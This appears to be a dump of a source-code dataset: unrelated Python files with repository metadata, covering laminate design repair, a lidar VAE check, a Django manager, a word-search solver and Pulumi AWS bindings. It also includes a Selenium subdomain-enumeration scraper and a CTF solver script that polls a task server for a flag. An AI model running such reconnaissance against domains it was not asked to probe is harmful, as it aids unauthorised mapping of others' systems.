from src.repair_flexural import repair_flexural
from src.repair_diso_contig import repair_diso_contig_list
from src.one_stack import check_ss_manufacturability
from src.lampam_functions import calc_lampam
def repair_ss(
ss, constraints, parameters, lampam_target, obj_no_constraints=None,
count_obj=False):
"""
repairs stacking sequences to meet design and manufacturing guidelines
and evaluates the performance of the repaired stacking sequence
The repair process is deterministic and attempts at conducting minimal
modification of the original stacking sequence with a preference for
modifying outer plies that have the least influence on out-of-plane
properties.
step 1: repair for the 10% rule and balance
step 2: refinement for in-plane lamination parameter convergence
step 3: repair for disorientation and contiguity
step 4: refinement for out-of-plane lamination parameter convergence
(step 5: attribute a poor objective function value to unrepaired layups)
OUTPUTS
-
INPUTS
- ss: stacking sequence of the laminate
- lampam_target: lamination parameter targets
- constraints: instance of the class Constraints
- parameters: instance of the class Parameters
- count_obj: flag to count the number of objective function calls
(- obj_no_constraints: objective function value of the initial stacking
sequence with no consideration of design and manufacturing constraints)
"""
ss_ini = np.copy(ss)
mini_10 = calc_mini_10(constraints, ss.size)
# print('before repair')
# print_ss(ss_ini)
#--------------------------------------------------------------------------
# step 1 / repair for the 10% rule and balance
#--------------------------------------------------------------------------
ss, ply_queue = repair_10_bal(ss, mini_10, constraints)
# print('after repair 10 and balance')
# print_ss(ss)
# print(ply_queue)
#--------------------------------------------------------------------------
# step 2 / improvement of the in-plane lamination parameter convergence
#--------------------------------------------------------------------------
ss_list, ply_queue_list, _ = repair_membrane(
ss=ss,
ply_queue=ply_queue,
mini_10=mini_10,
in_plane_coeffs=parameters.weighting_finalA,
parameters=parameters,
constraints=constraints,
lampam_target=lampam_target)
# print('after repair for membrane properties')
# for ind in range(len(ss_list)):
# print('ind', ind)
# print('ss_list[ind]', ss_list[ind])
# print('ply_queue_list[ind]', ply_queue_list[ind])
# if not is_ten_percent_rule(constraints, stack=ss_list[ind],
# ply_queue=ply_queue_list[ind]):
# print('lampam_target', lampam_target[0:4])
# raise Exception('10% rule not satisfied membrane')
# print('ss_list[0]')
# print_ss(ss_list[0])
# print('ply_queue_list[0]', ply_queue_list[0])
#--------------------------------------------------------------------------
# step 3 / repair for disorientation and contiguity
#--------------------------------------------------------------------------
ss, completed_inward, completed_outward, ind = repair_diso_contig_list(
ss_list, ply_queue_list, constraints,
parameters.n_D1)
# print('completed_inward, completed_outward, ind',
# completed_inward, completed_outward, ind)
if not completed_outward:
# print('unsuccessful repair for disorientation and/or contiguity')
if obj_no_constraints is None:
if count_obj:
return ss_ini, False, 0
else:
return ss_ini, False
if count_obj:
return ss_ini, False, 1e10, 0
else:
return ss_ini, False, 1e10
# print('successful repair for disorientation and/or contiguity')
# print_ss(ss)
#--------------------------------------------------------------------------
# step 4 / improvement of the out-of-plane lamination parameter convergence
#--------------------------------------------------------------------------
ss = repair_flexural(
ss=ss,
out_of_plane_coeffs=parameters.weighting_finalD,
lampam_target=lampam_target,
constraints=constraints,
parameters=parameters,
count_obj=count_obj)
if count_obj:
ss, n_obj_func_D_calls = ss
# print(' after repair')
# print_ss(ss)
# print('lampam_target', lampam_target)
if obj_no_constraints is None:
if count_obj:
return ss, True, n_obj_func_D_calls
else:
return ss, True
#--------------------------------------------------------------------------
# step 5 /
#--------------------------------------------------------------------------
obj_no_constraints = objectives(
lampam=calc_lampam(ss, constraints),
lampam_target=lampam_target,
lampam_weightings=parameters.lampam_weightings_final,
constraints=constraints,
parameters=parameters)
if count_obj:
return ss, True, 1e10, n_obj_func_D_calls
else:
return ss, True, 1e10
if __name__ == "__main__":
print('\n*** Test for the function repair_ss ***')
constraints = Constraints(
sym=True,
bal=True,
ipo=True,
dam_tol=False,
rule_10_percent=True,
diso=True,
contig=True,
delta_angle=45,
n_contig=5,
percent_0=10,
percent_45=0,
percent_90=10,
percent_135=0,
percent_45_135=10,
set_of_angles=[0, 45, -45, 90])
ss = np.array([45, 90, 45, 90, -45, -45, -45, -45, 90, 45, 45, 45,
90, -45, 0, 0, 0, -45, 90, 45, 45, 45, 90, -45,
-45, -45, -45, 90, 45, 90, 45], int)
ss_target = 60*np.ones((1,), dtype=int)
lampam_target = calc_lampam(ss_target)
#==========================================================================
# Optimiser Parameters
#==========================================================================
### Techniques to enforce the constraints
# repair to improve the convergence towards the in-plane lamination parameter
# targets
repair_membrane_switch = True
# repair to improve the convergence towards the out-of-plane lamination
# parameter targets
repair_flexural_switch = True
# balanced laminate scheme
balanced_scheme = False
# coefficient for the proportion of the laminate thickness that can be modified
# during the refinement for membrane properties in the repair process
p_A = 80
# number of plies in the last permutation during repair for disorientation
# and/or contiguity
n_D1 = 6
# number of ply shifts tested at each step of the re-designing process during
# refinement for flexural properties
n_D2 = 10
# number of times are redesigned during the refinement of flexural properties
n_D3 = 2
# Lamination parameters to be considered in the multi-objective functions
optimisation_type = 'D'
set_of_angles = np.array([-45, 0, 45, 90], int)
if optimisation_type == 'A':
if set_of_angles is np.array([-45, 0, 45, 90], int):
lampam_to_be_optimised = np.array([1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0])
else:
lampam_to_be_optimised = np.array([1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0])
if optimisation_type == 'D':
if set_of_angles is np.array([-45, 0, 45, 90], int):
lampam_to_be_optimised = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0])
else:
lampam_to_be_optimised = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1])
if optimisation_type == 'AD':
if set_of_angles is np.array([-45, 0, 45, 90], int):
lampam_to_be_optimised = np.array([1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0])
else:
lampam_to_be_optimised = np.array([1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1])
# Lamination parameters sensitivities from the first-lebel optimiser
first_level_sensitivities = np.ones((12,), float)
parameters = Parameters(
constraints=constraints,
p_A=p_A,
n_D1=n_D1,
n_D2=n_D2,
n_D3=n_D3,
first_level_sensitivities=first_level_sensitivities,
lampam_to_be_optimised=lampam_to_be_optimised,
repair_membrane_switch=repair_membrane_switch,
repair_flexural_switch=repair_flexural_switch)
ss, completed, n_obj_func_D_calls = repair_ss(
ss, constraints, parameters, lampam_target, count_obj=True)
print('Repair successful?', completed)
print_ss(ss, 20)
print('n_obj_func_D_calls', n_obj_func_D_calls)
check_ss_manufacturability(ss, constraints)
| 0 | 0 | 0 |
1d6bc2617865ad3a16bc19f3c20563f15c78f3ea | 1,488 | py | Python | navrep/scripts/check_vae1d.py | ReykCS/navrep | 22ee4727268188414a8121f069e45c2ab798ca19 | [
"MIT"
] | 48 | 2020-11-26T10:16:08.000Z | 2022-03-24T15:22:08.000Z | navrep/scripts/check_vae1d.py | ReykCS/navrep | 22ee4727268188414a8121f069e45c2ab798ca19 | [
"MIT"
] | 1 | 2021-12-14T02:08:18.000Z | 2022-03-14T09:17:25.000Z | navrep/scripts/check_vae1d.py | ReykCS/navrep | 22ee4727268188414a8121f069e45c2ab798ca19 | [
"MIT"
] | 18 | 2020-12-09T08:37:43.000Z | 2022-03-30T06:56:38.000Z | from __future__ import print_function
import numpy as np
import os
from sensor_msgs.msg import LaserScan
from navrep.tools.data_extraction import archive_to_lidar_dataset
from navrep.models.vae1d import Conv1DVAE, reset_graph
DEBUG_PLOTTING = True
# Parameters for training
batch_size = 100
N_SCANS_PER_BATCH = 1
NUM_EPOCH = 100
DATA_DIR = "record"
HOME = os.path.expanduser("~")
MAX_LIDAR_DIST = 25.0
vae_model_path = os.path.expanduser("~/navrep/models/V/vae1d.json")
# create network
reset_graph()
vae = Conv1DVAE(batch_size=batch_size, is_training=False)
# load
vae.load_json(vae_model_path)
# create training dataset
dataset = archive_to_lidar_dataset("~/navrep/datasets/V/ian", limit=180)
if len(dataset) == 0:
raise ValueError("no scans found, exiting")
print(len(dataset), "scans in dataset.")
# split into batches:
total_length = len(dataset)
num_batches = len(dataset)
dummy_msg = LaserScan()
dummy_msg.range_max = 100.0
dummy_msg.ranges = range(1080)
for idx in range(num_batches):
batch = dataset[idx:idx+N_SCANS_PER_BATCH]
scans = batch
obs = np.clip(scans.astype(np.float) / MAX_LIDAR_DIST, 0.0, MAX_LIDAR_DIST)
obs = obs.reshape(N_SCANS_PER_BATCH, 1080, 1)
obs_pred = vae.encode_decode(obs)
if True:
import matplotlib.pyplot as plt
plt.ion()
plt.figure("rings")
plt.cla()
plt.plot(obs[0,:,0])
plt.plot(obs_pred[0,:,0])
plt.title(idx)
# update
plt.pause(0.01)
| 24 | 79 | 0.715726 | from __future__ import print_function
import numpy as np
import os
from sensor_msgs.msg import LaserScan
from navrep.tools.data_extraction import archive_to_lidar_dataset
from navrep.models.vae1d import Conv1DVAE, reset_graph
DEBUG_PLOTTING = True
# Parameters for training
batch_size = 100
N_SCANS_PER_BATCH = 1
NUM_EPOCH = 100
DATA_DIR = "record"
HOME = os.path.expanduser("~")
MAX_LIDAR_DIST = 25.0
vae_model_path = os.path.expanduser("~/navrep/models/V/vae1d.json")
# create network
reset_graph()
vae = Conv1DVAE(batch_size=batch_size, is_training=False)
# load
vae.load_json(vae_model_path)
# create training dataset
dataset = archive_to_lidar_dataset("~/navrep/datasets/V/ian", limit=180)
if len(dataset) == 0:
raise ValueError("no scans found, exiting")
print(len(dataset), "scans in dataset.")
# split into batches:
total_length = len(dataset)
num_batches = len(dataset)
dummy_msg = LaserScan()
dummy_msg.range_max = 100.0
dummy_msg.ranges = range(1080)
for idx in range(num_batches):
batch = dataset[idx:idx+N_SCANS_PER_BATCH]
scans = batch
obs = np.clip(scans.astype(np.float) / MAX_LIDAR_DIST, 0.0, MAX_LIDAR_DIST)
obs = obs.reshape(N_SCANS_PER_BATCH, 1080, 1)
obs_pred = vae.encode_decode(obs)
if True:
import matplotlib.pyplot as plt
plt.ion()
plt.figure("rings")
plt.cla()
plt.plot(obs[0,:,0])
plt.plot(obs_pred[0,:,0])
plt.title(idx)
# update
plt.pause(0.01)
| 0 | 0 | 0 |
8fc85758ed23c6729ca478f239feae24bd8a47fe | 2,320 | py | Python | module/passive/dns_record.py | b1ackc4t/getdomain | 0d1d31c9abf1d3293d113bff46c400b246434807 | [
"Apache-2.0"
] | null | null | null | module/passive/dns_record.py | b1ackc4t/getdomain | 0d1d31c9abf1d3293d113bff46c400b246434807 | [
"Apache-2.0"
] | null | null | null | module/passive/dns_record.py | b1ackc4t/getdomain | 0d1d31c9abf1d3293d113bff46c400b246434807 | [
"Apache-2.0"
] | 1 | 2021-11-24T09:22:38.000Z | 2021-11-24T09:22:38.000Z | # modules in standard library
import re
from urllib.parse import urlparse
import requests
from selenium import webdriver
from selenium.webdriver.common.keys import Keys #需要引入 keys 包
import time
def main(domain):
"""
主函数,只需执行它就能get子域名
:param domain:
:return:
"""
dns_record = DnsRecord(domain)
set1 = dns_record.get_by_hackertarget()
return set1
if __name__ == '__main__':
# 自己在这个文件里尝试好,能获取子域名就提交上来
print(main("hubu.edu.cn")) # 输出hubu.edu.com的子域名 | 29.74359 | 135 | 0.580603 | # modules in standard library
import re
from urllib.parse import urlparse
import requests
from selenium import webdriver
from selenium.webdriver.common.keys import Keys #需要引入 keys 包
import time
class DnsRecord(object):
def __init__(self, domain):
"""
初始化基本信息
:param target: 要扫描的目标域名
"""
self.domain = domain
self.session = requests.Session()
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.8',
'Accept-Encoding': 'gzip',
}
def get_by_hackertarget(self):
subdomains = []
base_url="https://hackertarget.com/find-dns-host-records/"
#driver = webdriver.Chrome()
driver = webdriver.Firefox() #打开浏览器
#driver.get("http://www.baidu.com")
driver.get(base_url) #打开网页
#通过name方式定位
driver.find_element_by_name("theinput").send_keys(self.domain) #定位输入查询域名
#time.sleep(3)
#driver.maximize_window() #浏览器全屏显示
driver.find_element_by_name("theinput").send_keys(Keys.ENTER) #定位键盘操作,查询
time.sleep(3)
text = driver.find_element_by_id("formResponse").text #包括域名和IP
links = list()
link_regx = re.compile('(.*?)'+self.domain+'') #匹配域名
links = link_regx.findall(text)
try:
for link in links:
if not link.startswith('http'):
link = "http://" + link + self.domain
subdomain = urlparse(link).netloc
if subdomain not in subdomains and subdomain != self.domain:
subdomains.append(subdomain.strip())
except Exception:
pass
return subdomains
driver.quit()
def main(domain):
"""
主函数,只需执行它就能get子域名
:param domain:
:return:
"""
dns_record = DnsRecord(domain)
set1 = dns_record.get_by_hackertarget()
return set1
if __name__ == '__main__':
# 自己在这个文件里尝试好,能获取子域名就提交上来
print(main("hubu.edu.cn")) # 输出hubu.edu.com的子域名 | 1,305 | 601 | 24 |
878ce46586d03f4554547045ef951e1fae7509e8 | 41 | py | Python | venv/lib/python3.6/encodings/utf_16_be.py | JamesMusyoka/Blog | fdcb51cf4541bbb3b9b3e7a1c3735a0b1f45f0b5 | [
"Unlicense"
] | 2 | 2019-04-17T13:35:50.000Z | 2021-12-21T00:11:36.000Z | venv/lib/python3.6/encodings/utf_16_be.py | JamesMusyoka/Blog | fdcb51cf4541bbb3b9b3e7a1c3735a0b1f45f0b5 | [
"Unlicense"
] | 2 | 2021-03-31T19:51:24.000Z | 2021-06-10T23:05:09.000Z | venv/lib/python3.6/encodings/utf_16_be.py | JamesMusyoka/Blog | fdcb51cf4541bbb3b9b3e7a1c3735a0b1f45f0b5 | [
"Unlicense"
] | 2 | 2019-10-01T08:47:35.000Z | 2020-07-11T06:32:16.000Z | /usr/lib/python3.6/encodings/utf_16_be.py | 41 | 41 | 0.829268 | /usr/lib/python3.6/encodings/utf_16_be.py | 0 | 0 | 0 |
6ab189934782a1fb160cd1818c8c88eaeb7c5a43 | 1,110 | py | Python | interstitial/managers.py | invisiblehands/django-interstitial | 04bd811e180c8bb94bad04198228acbf6c5e7cff | [
"MIT"
] | null | null | null | interstitial/managers.py | invisiblehands/django-interstitial | 04bd811e180c8bb94bad04198228acbf6c5e7cff | [
"MIT"
] | null | null | null | interstitial/managers.py | invisiblehands/django-interstitial | 04bd811e180c8bb94bad04198228acbf6c5e7cff | [
"MIT"
] | null | null | null | from datetime import datetime
from django.db import models
from django.conf import settings
from django.core.cache import get_cache
| 27.75 | 65 | 0.626126 | from datetime import datetime
from django.db import models
from django.conf import settings
from django.core.cache import get_cache
class InterstitialManager(models.Manager):
def get_interstitial(self):
caching = getattr(settings, 'INTERSTITIAL_CACHE', True)
if caching:
cache = get_cache('default')
interstitial = cache.get('interstitial')
if interstitial:
return interstitial
today = datetime.now()
interstitial = self.filter(active = True).first()
if interstitial:
if interstitial.start and interstitial.start > today:
interstitial = None
if interstitial.end and interstitial.end <= today:
interstitial = None
if caching:
cache.set('interstitial', interstitial, 60 * 60)
return interstitial
def get_for_user(self, user):
interstitial = self.get_interstitial()
if interstitial and interstitial.draft:
if user.is_staff():
return interstitial
return interstitial
| 878 | 21 | 76 |
c4e22ffc44e425009a479fb44c3a678354488d3c | 3,959 | py | Python | wordsearch/main.py | maxrothman/wordsearch | 026187c994a4510d32f54223988be0787ca698ce | [
"MIT"
] | null | null | null | wordsearch/main.py | maxrothman/wordsearch | 026187c994a4510d32f54223988be0787ca698ce | [
"MIT"
] | null | null | null | wordsearch/main.py | maxrothman/wordsearch | 026187c994a4510d32f54223988be0787ca698ce | [
"MIT"
] | null | null | null | # Ensure that accidentally-raised StopIterations are transformed to RuntimeErrors
# Livin' in the future!
from __future__ import generator_stop
from wordsearch.board import Board
import string, random
def start_board_run(start, direction, board):
"""
A generator that yields successive values of "board" starting from "start" and
moving in "direction", raising a StopIteration when the edge of the board is
crossed.
"direction" is added as a vector to the current position on every iteration.
For example, for start = (0,0) and direction = (1,1), this will yield the letters
at (0,0), (1,1), (2,2), etc.
Args:
start: a 2-tuple of ints (x,y) for which coordinates to start at in "board"
direction: a 2-tuple of ints (x,y) of which direction to iterate in.
Both x and y should be one of (-1, 0, 1) and (0, 0) is invalid.
board: a Board to search in
Yields: next letter in run (type depends on board value type)
"""
if not all(d in (-1, 0, 1) for d in direction):
raise ValueError('All values in direction should be one of (-1, 0, 1), got {}'.format(direction))
if direction == (0, 0):
raise ValueError("Direction cannot be (0, 0)")
cur_pt = start
try:
while True:
yield board[cur_pt[0], cur_pt[1]]
cur_pt = (cur_pt[0] + direction[0], cur_pt[1] + direction[1])
except IndexError:
return
def start_trie_search(root):
"""
A generator that progressively searches down a trie. When given a letter with
"trie_search.send(letter)", it does the following:
- If the letter is not a child of the current node, raise a StopIteration
- If the letter is a child of the current node, select it, and yield whether it
ends a word
You must "prime" the generator by calling next() or .send(None) on it
once before .send()-ing the first letter.
Args:
root: root TrieNode to begin the search with
Yields: whether the letter ends a word (bool)
"""
cur_node = root
letter = None
while True:
letter = yield cur_node.word_end
try:
cur_node = cur_node.children[letter]
except KeyError:
return
# List of x,y vectors (tuples) for all directions a word can be found in, i.e. forwards
# or backwards in rows or columns, and on diagonals.
# E.g. (0, 1) = down, (1, 1) = diagonal down-right, (1, 0) = right, ...
_directions = [(x, y) for x in range(-1, 2) for y in range (-1, 2) if not (x == 0 and y == 0)]
def search_board(board, rootnode):
"""
A generator that searches for words in "board" using the trie rooted by "rootnode"
and yields the words found.
Args:
board: a Board to search
rootnode: a TrieNode that roots a trie used to identify words
Yields: a word found in board (string)
"""
for x, y, letter in board:
for direction in _directions:
board_run = start_board_run((x, y), direction, board)
trie_search = start_trie_search(rootnode)
next(trie_search) #Prime trie_search
letters = []
last_word_end = None
# Try advancing both generators until one runs out. That means we've either hit
# the edge of the board or the bottom of the trie.
#
# Keep track of the letters as we go and the location of the last-found
# word_end flag in the trie. When we hit then end, grab all the letters until
# the last-found flag.
try:
while True:
letter = next(board_run)
letters.append(letter)
word_end = trie_search.send(letter)
if word_end:
last_word_end = len(letters)
except StopIteration:
pass
if last_word_end is not None:
yield ''.join(letters[:last_word_end])
def random_board(width, height):
"""
Returns a Board of random lowercase letters
Args:
width: width of the board
height: height of the board
"""
return Board([[random.choice(string.ascii_lowercase) for _ in range(width)] for _ in range(height)]) | 32.45082 | 102 | 0.667593 | # Ensure that accidentally-raised StopIterations are transformed to RuntimeErrors
# Livin' in the future!
from __future__ import generator_stop
from wordsearch.board import Board
import string, random
def start_board_run(start, direction, board):
"""
A generator that yields successive values of "board" starting from "start" and
moving in "direction", raising a StopIteration when the edge of the board is
crossed.
"direction" is added as a vector to the current position on every iteration.
For example, for start = (0,0) and direction = (1,1), this will yield the letters
at (0,0), (1,1), (2,2), etc.
Args:
start: a 2-tuple of ints (x,y) for which coordinates to start at in "board"
direction: a 2-tuple of ints (x,y) of which direction to iterate in.
Both x and y should be one of (-1, 0, 1) and (0, 0) is invalid.
board: a Board to search in
Yields: next letter in run (type depends on board value type)
"""
if not all(d in (-1, 0, 1) for d in direction):
raise ValueError('All values in direction should be one of (-1, 0, 1), got {}'.format(direction))
if direction == (0, 0):
raise ValueError("Direction cannot be (0, 0)")
cur_pt = start
try:
while True:
yield board[cur_pt[0], cur_pt[1]]
cur_pt = (cur_pt[0] + direction[0], cur_pt[1] + direction[1])
except IndexError:
return
def start_trie_search(root):
"""
A generator that progressively searches down a trie. When given a letter with
"trie_search.send(letter)", it does the following:
- If the letter is not a child of the current node, raise a StopIteration
- If the letter is a child of the current node, select it, and yield whether it
ends a word
You must "prime" the generator by calling next() or .send(None) on it
once before .send()-ing the first letter.
Args:
root: root TrieNode to begin the search with
Yields: whether the letter ends a word (bool)
"""
cur_node = root
letter = None
while True:
letter = yield cur_node.word_end
try:
cur_node = cur_node.children[letter]
except KeyError:
return
# List of x,y vectors (tuples) for all directions a word can be found in, i.e. forwards
# or backwards in rows or columns, and on diagonals.
# E.g. (0, 1) = down, (1, 1) = diagonal down-right, (1, 0) = right, ...
_directions = [(x, y) for x in range(-1, 2) for y in range (-1, 2) if not (x == 0 and y == 0)]
def search_board(board, rootnode):
"""
A generator that searches for words in "board" using the trie rooted by "rootnode"
and yields the words found.
Args:
board: a Board to search
rootnode: a TrieNode that roots a trie used to identify words
Yields: a word found in board (string)
"""
for x, y, letter in board:
for direction in _directions:
board_run = start_board_run((x, y), direction, board)
trie_search = start_trie_search(rootnode)
next(trie_search) #Prime trie_search
letters = []
last_word_end = None
# Try advancing both generators until one runs out. That means we've either hit
# the edge of the board or the bottom of the trie.
#
# Keep track of the letters as we go and the location of the last-found
# word_end flag in the trie. When we hit then end, grab all the letters until
# the last-found flag.
try:
while True:
letter = next(board_run)
letters.append(letter)
word_end = trie_search.send(letter)
if word_end:
last_word_end = len(letters)
except StopIteration:
pass
if last_word_end is not None:
yield ''.join(letters[:last_word_end])
def random_board(width, height):
"""
Returns a Board of random lowercase letters
Args:
width: width of the board
height: height of the board
"""
return Board([[random.choice(string.ascii_lowercase) for _ in range(width)] for _ in range(height)]) | 0 | 0 | 0 |
5dd5b3aaa3549ee4e2e1c9dfd185b4953bf00728 | 3,575 | py | Python | sdk/python/pulumi_aws/ebs/get_snapshot_ids.py | JakeGinnivan/pulumi-aws | c91ef78932964ac74eda7f5da81f65b0f1798c93 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/ebs/get_snapshot_ids.py | JakeGinnivan/pulumi-aws | c91ef78932964ac74eda7f5da81f65b0f1798c93 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/ebs/get_snapshot_ids.py | JakeGinnivan/pulumi-aws | c91ef78932964ac74eda7f5da81f65b0f1798c93 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class GetSnapshotIdsResult:
"""
A collection of values returned by getSnapshotIds.
"""
# pylint: disable=using-constant-test
def get_snapshot_ids(filters=None,owners=None,restorable_by_user_ids=None,opts=None):
"""
Use this data source to get a list of EBS Snapshot IDs matching the specified
criteria.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
ebs_volumes = aws.ebs.get_snapshot_ids(filters=[
{
"name": "volume-size",
"values": ["40"],
},
{
"name": "tag:Name",
"values": ["Example"],
},
],
owners=["self"])
```
:param list filters: One or more name/value pairs to filter off of. There are
several valid keys, for a full reference, check out
[describe-volumes in the AWS CLI reference][1].
:param list owners: Returns the snapshots owned by the specified owner id. Multiple owners can be specified.
:param list restorable_by_user_ids: One or more AWS accounts IDs that can create volumes from the snapshot.
The **filters** object supports the following:
* `name` (`str`)
* `values` (`list`)
"""
__args__ = dict()
__args__['filters'] = filters
__args__['owners'] = owners
__args__['restorableByUserIds'] = restorable_by_user_ids
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = utilities.get_version()
__ret__ = pulumi.runtime.invoke('aws:ebs/getSnapshotIds:getSnapshotIds', __args__, opts=opts).value
return AwaitableGetSnapshotIdsResult(
filters=__ret__.get('filters'),
id=__ret__.get('id'),
ids=__ret__.get('ids'),
owners=__ret__.get('owners'),
restorable_by_user_ids=__ret__.get('restorableByUserIds'))
| 34.708738 | 112 | 0.643077 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class GetSnapshotIdsResult:
"""
A collection of values returned by getSnapshotIds.
"""
def __init__(__self__, filters=None, id=None, ids=None, owners=None, restorable_by_user_ids=None):
if filters and not isinstance(filters, list):
raise TypeError("Expected argument 'filters' to be a list")
__self__.filters = filters
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
__self__.id = id
"""
The provider-assigned unique ID for this managed resource.
"""
if ids and not isinstance(ids, list):
raise TypeError("Expected argument 'ids' to be a list")
__self__.ids = ids
if owners and not isinstance(owners, list):
raise TypeError("Expected argument 'owners' to be a list")
__self__.owners = owners
if restorable_by_user_ids and not isinstance(restorable_by_user_ids, list):
raise TypeError("Expected argument 'restorable_by_user_ids' to be a list")
__self__.restorable_by_user_ids = restorable_by_user_ids
class AwaitableGetSnapshotIdsResult(GetSnapshotIdsResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetSnapshotIdsResult(
filters=self.filters,
id=self.id,
ids=self.ids,
owners=self.owners,
restorable_by_user_ids=self.restorable_by_user_ids)
def get_snapshot_ids(filters=None,owners=None,restorable_by_user_ids=None,opts=None):
"""
Use this data source to get a list of EBS Snapshot IDs matching the specified
criteria.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
ebs_volumes = aws.ebs.get_snapshot_ids(filters=[
{
"name": "volume-size",
"values": ["40"],
},
{
"name": "tag:Name",
"values": ["Example"],
},
],
owners=["self"])
```
:param list filters: One or more name/value pairs to filter off of. There are
several valid keys, for a full reference, check out
[describe-volumes in the AWS CLI reference][1].
:param list owners: Returns the snapshots owned by the specified owner id. Multiple owners can be specified.
:param list restorable_by_user_ids: One or more AWS accounts IDs that can create volumes from the snapshot.
The **filters** object supports the following:
* `name` (`str`)
* `values` (`list`)
"""
__args__ = dict()
__args__['filters'] = filters
__args__['owners'] = owners
__args__['restorableByUserIds'] = restorable_by_user_ids
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = utilities.get_version()
__ret__ = pulumi.runtime.invoke('aws:ebs/getSnapshotIds:getSnapshotIds', __args__, opts=opts).value
return AwaitableGetSnapshotIdsResult(
filters=__ret__.get('filters'),
id=__ret__.get('id'),
ids=__ret__.get('ids'),
owners=__ret__.get('owners'),
restorable_by_user_ids=__ret__.get('restorableByUserIds'))
| 1,253 | 37 | 74 |
94aa194bc312507a4ff1a92f580f44183d5dd89f | 1,067 | py | Python | tasks/broken-transmitter/exploit.py | chankruze/qctf-school-2018 | 1e732cf264ee0a94bc2fc1fd8cf3a20660d57605 | [
"MIT"
] | null | null | null | tasks/broken-transmitter/exploit.py | chankruze/qctf-school-2018 | 1e732cf264ee0a94bc2fc1fd8cf3a20660d57605 | [
"MIT"
] | null | null | null | tasks/broken-transmitter/exploit.py | chankruze/qctf-school-2018 | 1e732cf264ee0a94bc2fc1fd8cf3a20660d57605 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import re
import requests
from time import sleep
from argparse import ArgumentParser
if __name__ == '__main__':
args = get_args()
data = ''
pattern = 'QCTF{.*?}'
while not re.search(pattern, data):
update = requests.get('%s/%s/' % (args.url, args.token)).text
hexcode = re.search('\>([\w\s]*?)\<\/div', update).group(1)
if not hexcode:
continue
text = ''.join([chr(int(code, 16)) for code in hexcode.split(' ')])
if text not in data:
data += text
print('Downloaded text length: %d' % len(data))
sleep(args.timeout)
print(data)
print()
print('Found flag!')
print(re.search(pattern, data).group(0))
| 29.638889 | 103 | 0.612933 | #!/usr/bin/python3
import re
import requests
from time import sleep
from argparse import ArgumentParser
def get_args():
parser = ArgumentParser()
parser.add_argument('--url', help='server address (with http)', required=True)
parser.add_argument('--token', help='your token', required=True)
parser.add_argument('--timeout', help='timeout between requests (default 10)', type=int, default=5)
return parser.parse_args()
if __name__ == '__main__':
args = get_args()
data = ''
pattern = 'QCTF{.*?}'
while not re.search(pattern, data):
update = requests.get('%s/%s/' % (args.url, args.token)).text
hexcode = re.search('\>([\w\s]*?)\<\/div', update).group(1)
if not hexcode:
continue
text = ''.join([chr(int(code, 16)) for code in hexcode.split(' ')])
if text not in data:
data += text
print('Downloaded text length: %d' % len(data))
sleep(args.timeout)
print(data)
print()
print('Found flag!')
print(re.search(pattern, data).group(0))
| 311 | 0 | 23 |
3613506af86ab39ddcebe6227a8d8d4a204e0b51 | 1,031 | py | Python | mayan/apps/documents/migrations/0025_auto_20150718_0742.py | nattangwiwat/Mayan-EDMS-recitation | fcf16afb56eae812fb99144d65ae1ae6749de0b7 | [
"Apache-2.0"
] | 343 | 2015-01-05T14:19:35.000Z | 2018-12-10T19:07:48.000Z | mayan/apps/documents/migrations/0025_auto_20150718_0742.py | nattangwiwat/Mayan-EDMS-recitation | fcf16afb56eae812fb99144d65ae1ae6749de0b7 | [
"Apache-2.0"
] | 191 | 2015-01-03T00:48:19.000Z | 2018-11-30T09:10:25.000Z | mayan/apps/documents/migrations/0025_auto_20150718_0742.py | nattangwiwat/Mayan-EDMS-recitation | fcf16afb56eae812fb99144d65ae1ae6749de0b7 | [
"Apache-2.0"
] | 257 | 2019-05-14T10:26:37.000Z | 2022-03-30T03:37:36.000Z | import pycountry
from django.db import migrations
| 32.21875 | 87 | 0.669253 | import pycountry
from django.db import migrations
def operation_change_bibliographic_to_terminology(apps, schema_editor):
Document = apps.get_model(app_label='documents', model_name='Document')
for document in Document.objects.using(alias=schema_editor.connection.alias).all():
try:
language = pycountry.languages.get(bibliographic=document.language)
except KeyError:
# The pycountry version used doesn't support the 'bibliographic'
# key. Reset the document's language to English.
# GitHub issue #250
# https://github.com/mayan-edms/mayan-edms/issues/250
document.language = 'eng'
document.save()
else:
document.language = language.terminology
document.save()
class Migration(migrations.Migration):
dependencies = [
('documents', '0024_auto_20150715_0714'),
]
operations = [
migrations.RunPython(code=operation_change_bibliographic_to_terminology),
]
| 730 | 202 | 46 |
edfc96ae8b85b7ba7a88f0bebf54e995343650f3 | 550 | py | Python | nisyscfg/types.py | tkrebes/nisyscfg-python | 080cec262a30bfc2b00f703996d2ad896578a67a | [
"MIT"
